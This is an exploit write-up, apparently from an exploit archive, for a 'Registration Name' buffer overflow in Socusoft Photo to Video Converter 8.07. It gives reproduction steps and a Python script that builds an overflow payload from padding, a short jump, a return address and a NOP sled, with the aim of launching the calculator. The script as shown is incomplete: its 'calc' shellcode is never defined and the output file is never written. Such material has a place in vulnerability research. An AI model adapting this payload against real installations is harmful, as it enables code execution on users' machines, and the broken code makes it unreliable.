Socusoft Photo to Video Converter version 8.07 suffers from a buffer overflow vulnerability.
# Exploit Title: Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow
# Exploit Author : ZwX
# Exploit Date: 2018-09-13
# Vendor Homepage :
# Version Software : 8.07
# Tested on OS: Windows 7
# Related Exploit Link :
Steps to Reproduce:
1.Download and install Photo to Video Converter Professional
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "" then go to Menu -> Help -> Save
4.Paste the contents of the file (poc.txt) into the input "Registration Name" and click "Activate"
5.Now the calculator executes!
from struct import pack
buffer = "\x41" * 256
a = "\xeb\x06\xff\xff"
b = pack("<I",0x10015d71)
nops = "\x90" * 20
c = "\x44" * 800
poc = buffer + a + b + nops + calc + c
file = open("poc.txt","w")
print "POC Created by ZwX"